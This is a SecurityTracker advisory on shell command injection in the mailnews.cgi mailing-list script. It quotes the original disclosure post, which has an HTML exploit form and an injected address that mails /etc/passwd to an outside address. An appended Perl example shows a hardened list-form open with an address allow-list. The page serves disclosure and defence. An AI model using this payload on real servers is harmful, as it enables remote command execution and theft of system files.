SecurityTracker.com
Category:   Application (Web Server/CGI)  >   Mailnews
Vendors:   Reuter, Claude
Mailnews Cgi Script May Execute Arbitrary Shell Commands Supplied By Unauthorized Users Via the Network
SecurityTracker Alert ID:  1000949
SecurityTracker URL:  http://securitytracker.com/id/1000949
CVE Reference:   GENERIC-MAP-NOMATCH
Updated:  Feb 28 2001
Original Entry Date:  Feb 21 2001
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 1.1, 1.3
Description:   The CGI-based MAILNEWS mailing list management software reportedly contains several vulnerabilities that allow an attacker to remotely supply shell commands to be executed by the CGI script.

The potentially most serious vulnerability is that the software fails to appropriately filter certain input parameters, so an attacker can supply arbitrary shell commands that the CGI script then executes. In addition, the script does not properly protect and enforce passwords, so an unauthorized user without knowledge of the administrative password can add or delete users from an affected maillist.

The original message contains demonstration exploit code.

Impact:   An attacker can remotely provide shell commands to be executed by the cgi script with the privileges of the cgi script.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.creuter.lu/programming/perl/index.asp
Cause:   Authentication error, Input validation error
Underlying OS:  Linux (Any), Apple (Legacy "classic" Mac), UNIX (Any), Windows (Any)
Underlying OS Comments:  Vulnerable target is a Perl script

Message History:   None.


 Source Message Contents

Subject:  CGI - mailnews.cgi vulnerability...


Hello BuGReaders...

##Script: mailnews.cgi

##Introduction:

<cat from source>
CGI-Script MAILNEWS 1.3
This script helps you to maintain a mailinglist.
</cat>

##Tested Version: 1.1, 1.3

The author doesn't parse some characters and he uses a very stupid "password
protection". We can add or delete users from the maillist without knowing the
admin password. But this is a small problem ;] . Let's see what more we can
do.
<cat source>
	open (MAIL, "|$mailprog $member") || die "Can't open $mailprog!\n";
</cat>
where $mailprog [default] is sendmail and $member is the users from the usersfile.
Now we can do something like this: add the user "; cat /etc/passwd | mail
adam@malysz.pl" and use the subroutine to execute this code :]

Simple exploit in html:

<HTML>
<BODY>
<FORM
ACTION="http://www.adamalysz.com/cgi-bin/mailnews.cgi" METHOD=POST>
<INPUT type=hidden NAME="action" value="subscribe">
<BR>
User to add with ;  [ex:" ; cat /etc/passwd |mail adam@malysz.pl"
without quotes of course ]<INPUT NAME="address" TYPE="TEXT">
<INPUT  TYPE="SUBMIT" VALUE="Submit">
</FORM>
<BR>
<A HREF="http://www.adamalysz.com./cgi-bin/mailnews.cgi?news">
Execute command :] </A>
<CENTER> Peace... </CENTER>
</BODY>
</HTML>

Who :	Kanedaaa
	kaneda@ac.pl


***$$$###  " And maybe very many won't understand these words...
		But there is no mercy for SONS OF BITCHES .... " ###$$*
kaneda@ac.pl Hero ... Boss ... Abuser ... Cucumber Team Member... Bzz..
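
The piped open quoted in the source message hands one interpolated string to the shell, which is why an address stored in the users file can carry commands. The Perl below is an added example, not code from the original message or from the MAILNEWS author; it shows that line replaced by a list-form open with an address allow-list. The sendmail path, the allow-list pattern and the sub names valid_address and send_to_member are assumptions of this example.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Assumed path; the script's real configuration is not shown on the page.
my $mailprog = '/usr/sbin/sendmail';

# Conservative allow-list for a subscriber address (an assumption of this
# example, deliberately stricter than RFC 5322): no whitespace, no shell
# metacharacters, and no leading '-' that the mailer could read as an option.
sub valid_address {
    my ($addr) = @_;
    return 0 unless defined $addr && length($addr) <= 254;
    return $addr =~ /\A[A-Za-z0-9_][A-Za-z0-9._+-]*\@[A-Za-z0-9](?:[A-Za-z0-9.-]*[A-Za-z0-9])?\z/
        ? 1 : 0;
}

# Vulnerable pattern, as quoted in the report: the whole string goes to /bin/sh.
#   open (MAIL, "|$mailprog $member") || die "Can't open $mailprog!\n";

# Hardened form: list-form piped open executes the mailer directly with an
# argument vector, so no shell ever parses $member. "--" ends option parsing
# (assumes a sendmail-compatible binary that honours it).
sub send_to_member {
    my ($member, $message) = @_;
    die "rejected address\n" unless valid_address($member);
    open(my $mail, '|-', $mailprog, '-oi', '--', $member)
        or die "Can't run $mailprog: $!\n";
    print {$mail} $message;
    close($mail) or warn "$mailprog exited with status $?\n";
    return 1;
}

# Constructed sample inputs: a normal address, a value shaped like the one
# in the report, and an option-style value. Only the check is run here, so
# the script works without a mailer installed.
for my $candidate ('alice@example.org',
                   '; cat /etc/passwd | mail x@example.org',
                   '-bp@example.org') {
    printf "%-42s %s\n", $candidate,
        valid_address($candidate) ? 'accepted' : 'rejected';
}
```

Apply the same check when an address is first written to the users file and again when it is read back for sending, since an existing file may already hold hostile entries.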


 
 



Copyright 2017, SecurityGlobal.net LLC